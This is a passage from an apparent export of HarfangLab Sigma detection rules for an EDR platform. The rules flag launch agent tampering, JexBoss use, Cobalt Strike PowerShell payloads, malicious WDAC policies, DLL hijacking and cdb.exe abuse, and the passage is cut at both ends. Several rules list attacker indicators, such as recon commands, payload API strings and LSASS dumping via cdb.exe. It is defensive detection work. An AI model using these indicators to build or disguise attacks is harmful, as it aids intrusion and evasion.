"content": "title: Launch Agent Modified\nid: 9eef92d3-30f8-41cf-aef3-2097a98e42ee\ndescription: |\n Detects a modification of a launch agent.\n Adversaries may modify existing launch agents in order to install a backdoor.\n It is recommended to check if the process making the modification has legitimate reason to do it.\nreferences:\n - https://attack.mitre.org/techniques/T1543/001/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.001\n - attack.defense_evasion\n - attack.t1647\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.SystemModification\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n - Path|startswith:\n - '/System/Library/LaunchAgents/'\n - '/Library/LaunchAgents/'\n - '/Users/*/Library/LaunchAgents/'\n - TargetPath|startswith:\n - '/System/Library/LaunchAgents/'\n - '/Library/LaunchAgents/'\n - '/Users/*/Library/LaunchAgents/'\n selection_process:\n ProcessImage|contains: '?'\n\n filter_access:\n Kind:\n - 'read'\n - 'remove'\n - 'chmod'\n - 'chown'\n - 'create'\n\n filter_nosync:\n Path|contains: '.dat.nosync'\n\n exclusion_airwatch:\n Image: '/Library/Application Support/AirWatch/hubd'\n\n exclusion_jamf:\n Image:\n - '/usr/local/jamf/bin/jamf'\n - '/Library/Application Support/JAMF/Remote Assist/connect/jamfRemoteAssist'\n\n exclusion_cp:\n Image: '/bin/cp'\n\n exclusion_teamviewer:\n Image: '/Library/PrivilegedHelperTools/com.teamviewer.Helper'\n\n # TODO : when signature available uncomment this and remove 
the next exclusion\n # exclusion_app:\n # Image|startswith:\n # - '/Application'\n # - '/Users/*/Library/Application Support/'\n # ProcessSigned: 'true'\n exclusion_finder:\n ProcessImage: '/system/library/coreservices/finder.app/contents/macos/finder'\n\n exclusion_common_folders:\n - ProcessImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n - '/opt/homebrew/'\n - ProcessParentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n - '/opt/homebrew/'\n - ProcessGrandparentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n - '/opt/homebrew/'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9eef92d3-30f8-41cf-aef3-2097a98e42ee",
"rule_name": "Launch Agent Modified",
"rule_description": "Detects a modification of a launch agent.\nAdversaries may modify existing launch agents in order to install a backdoor.\nIt is recommended to check if the process making the modification has legitimate reason to do it.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.001",
"attack.t1647"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9f09d436-4bef-4f87-94a3-3a0bdbc7d7bb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077353Z",
"creation_date": "2026-03-23T11:45:34.077355Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077360Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/joaomatosf/jexboss",
"https://www.cisa.gov/uscert/ncas/analysis-reports/AR18-312A",
"https://attack.mitre.org/techniques/T1190/"
],
"name": "t1190_jexboss_usage.yml",
"content": "title: Possible JexBoss Execution\nid: 9f09d436-4bef-4f87-94a3-3a0bdbc7d7bb\ndescription: |\n Detects the execution of JexBoss.\n JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and other Java platforms.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - https://github.com/joaomatosf/jexboss\n - https://www.cisa.gov/uscert/ncas/analysis-reports/AR18-312A\n - https://attack.mitre.org/techniques/T1190/\ndate: 2022/05/23\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.JexBoss\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine:\n - 'cmd.exe /C uname -a'\n - 'cmd.exe /C cat /etc/issue'\n - 'cmd.exe /C id'\n ParentCommandLine|contains: 'jboss'\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9f09d436-4bef-4f87-94a3-3a0bdbc7d7bb",
"rule_name": "Possible JexBoss Execution",
"rule_description": "Detects the execution of JexBoss.\nJexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and other Java platforms.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2022-05-23",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1190"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9f0f3944-c7d2-4c5f-888b-bac198e03921",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083954Z",
"creation_date": "2026-03-23T11:45:34.083963Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083968Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://gchq.github.io/CyberChef/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/software/S0154/"
],
"name": "t1059_001_cobalt_powershell_payload.yml",
"content": "title: Cobalt Strike PowerShell Payload Detected\nid: 9f0f3944-c7d2-4c5f-888b-bac198e03921\ndescription: |\n Detects the standard Cobalt Strike PowerShell payload template.\n The goal of the payload is to create a connection to the team server to allow an attacker to interact with the machine.\n The payload can be easily decoded with CyberChef tool.\n It is recommended to investigate the process tree for suspicious activities.\nreferences:\n - https://gchq.github.io/CyberChef/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/software/S0154/\ndate: 2021/11/23\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.t1106\n - attack.s0154\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n # .NET APIs\n - 'GetMethod'\n - 'GetDelegateForFunctionPointer'\n\n # Native APIs\n - 'VirtualAlloc'\n - 'GetProcAddress'\n - 'GetModuleHandle'\n\n # payload XOR loop\n - '-bxor 35'\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9f0f3944-c7d2-4c5f-888b-bac198e03921",
"rule_name": "Cobalt Strike PowerShell Payload Detected",
"rule_description": "Detects the standard Cobalt Strike PowerShell payload template.\nThe goal of the payload is to create a connection to the team server to allow an attacker to interact with the machine.\nThe payload can be easily decoded with CyberChef tool.\nIt is recommended to investigate the process tree for suspicious activities.\n",
"rule_creation_date": "2021-11-23",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1106"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9f13ba3c-0293-498b-b769-b5966fb5c0ba",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622404Z",
"creation_date": "2026-03-23T11:45:34.622406Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622411Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_suspicious_wdac_policy_created.yml",
"content": "title: Suspicious WDAC Policy Created\nid: 9f13ba3c-0293-498b-b769-b5966fb5c0ba\ndescription: |\n Detects the creation of a Windows Defender Application Control (WDAC) policy file, which may indicate changes to application trust or execution policies.\n Windows Defender Application Control (WDAC) is a Windows security feature that defines which applications and binaries are allowed to run on a system.\n An attacker-controlled WDAC policy can be used to bypass EDR enforcement, allow the execution of malicious code, and establish persistence by controlling which binaries are trusted on the system.\n It is recommended to investigate the originating process and context of the WDAC policy file creation to determine whether the activity is legitimate or malicious.\nreferences:\n - https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/01/02\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path:\n - '?:\\Windows\\System32\\CodeIntegrity\\SiPolicy.p7b'\n - '?:\\Windows\\System32\\CodeIntegrity\\CiPolicies\\Active\\SiPolicy.p7b'\n - '?:\\Windows\\System32\\CodeIntegrity\\CiPolicies\\Active\\{????????-????-????-????-????????????}.cip'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k 
UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_intune:\n ProcessImage: '?:\\Windows\\System32\\omadmclient.exe'\n\n exclusion_wmi:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -secured -Embedding'\n Path: '?:\\Windows\\System32\\CodeIntegrity\\SiPolicy.p7b'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9f13ba3c-0293-498b-b769-b5966fb5c0ba",
"rule_name": "Suspicious WDAC Policy Created",
"rule_description": "Detects the creation of a Windows Defender Application Control (WDAC) policy file, which may indicate changes to application trust or execution policies.\nWindows Defender Application Control (WDAC) is a Windows security feature that defines which applications and binaries are allowed to run on a system.\nAn attacker-controlled WDAC policy can be used to bypass EDR enforcement, allow the execution of malicious code, and establish persistence by controlling which binaries are trusted on the system.\nIt is recommended to investigate the originating process and context of the WDAC policy file creation to determine whether the activity is legitimate or malicious.\n",
"rule_creation_date": "2025-01-02",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9f30d778-cc39-4952-97c0-7fa4be2c026e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611100Z",
"creation_date": "2026-03-23T11:45:34.611103Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611111Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_launchwinapp.yml",
"content": "title: DLL Hijacking via LaunchWinApp.exe\nid: 9f30d778-cc39-4952-97c0-7fa4be2c026e\ndescription: |\n Detects potential Windows DLL Hijacking via LaunchWinApp.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'LaunchWinApp.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\iertutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9f30d778-cc39-4952-97c0-7fa4be2c026e",
"rule_name": "DLL Hijacking via LaunchWinApp.exe",
"rule_description": "Detects potential Windows DLL Hijacking via LaunchWinApp.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9f7e0fa2-5120-4011-8793-2b89c593ebe7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087631Z",
"creation_date": "2026-03-23T11:45:34.087633Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087637Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/",
"https://attack.mitre.org/techniques/T1127/"
],
"name": "t1127_cdb_execution_for_proxy_or_dump.yml",
"content": "title: Suspicious cdb.exe Execution\nid: 9f7e0fa2-5120-4011-8793-2b89c593ebe7\ndescription: |\n Detects a suspicious execution of cdb.exe.\n Attackers can use this legitimate developer tool in order to proxy the execution of malicious payloads or dump process memory (such as LSASS').\n It is recommended to investigate the file provided in the command-line to determine whether this action was legitimate.\nreferences:\n - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/\n - https://attack.mitre.org/techniques/T1127/\ndate: 2022/06/10\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1127\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Cdb\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'cdb.exe'\n\n selection_commandline_1:\n CommandLine|contains:\n - ' -c *$<*'\n - ' /c *$<*'\n\n selection_commandline_2:\n CommandLine|contains:\n - ' -cf '\n - ' /cf '\n\n condition: selection and 1 of selection_commandline_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9f7e0fa2-5120-4011-8793-2b89c593ebe7",
"rule_name": "Suspicious cdb.exe Execution",
"rule_description": "Detects a suspicious execution of cdb.exe.\nAttackers can use this legitimate developer tool in order to proxy the execution of malicious payloads or dump process memory (such as LSASS').\nIt is recommended to investigate the file provided in the command-line to determine whether this action was legitimate.\n",
"rule_creation_date": "2022-06-10",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1127",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9fbba3f7-6063-4790-ae44-e46758f630d3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607746Z",
"creation_date": "2026-03-23T11:45:34.607749Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607757Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_scheduled_task_public_folder.yml",
"content": "title: Scheduled Task Created in Public User Folder\nid: 9fbba3f7-6063-4790-ae44-e46758f630d3\ndescription: |\n Detects a scheduled task being created with one of its actions referencing the \"C:\\Users\\Public\" folder.\n This folder is an uncommon directory for binaries to execute from and is often abused by attackers.\n It is recommended to investigate the process creating the scheduled task, in addition to any binaries or commands referenced in the scheduled task for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2025/10/16\nmodified: 2025/10/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ScheduledTask\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: scheduled_task\ndetection:\n selection:\n OperationType: 'create'\n TaskContent|contains: '?:\\Users\\Public\\\\*.exe'\n\n filter_depth:\n TaskContent|contains: '?:\\Users\\Public\\\\*\\\\*.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9fbba3f7-6063-4790-ae44-e46758f630d3",
"rule_name": "Scheduled Task Created in Public User Folder",
"rule_description": "Detects a scheduled task being created with one of its actions referencing the \"C:\\Users\\Public\" folder.\nThis folder is an uncommon directory for binaries to execute from and is often abused by attackers.\nIt is recommended to investigate the process creating the scheduled task, in addition to any binaries or commands referenced in the scheduled task for suspicious activities.\n",
"rule_creation_date": "2025-10-16",
"rule_modified_date": "2025-10-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9fece9bc-3902-4c65-aa6a-0d1e161a1691",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594373Z",
"creation_date": "2026-03-23T11:45:34.594377Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594385Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_route.yml",
"content": "title: DLL Hijacking via route.exe\nid: 9fece9bc-3902-4c65-aa6a-0d1e161a1691\ndescription: |\n Detects potential Windows DLL Hijacking via route.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'route.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\IPHLPAPI.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9fece9bc-3902-4c65-aa6a-0d1e161a1691",
"rule_name": "DLL Hijacking via route.exe",
"rule_description": "Detects potential Windows DLL Hijacking via route.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a0466fa2-bd36-4417-8ffc-f643d82c590d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082703Z",
"creation_date": "2026-03-23T11:45:34.082705Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082710Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wimserv.yml",
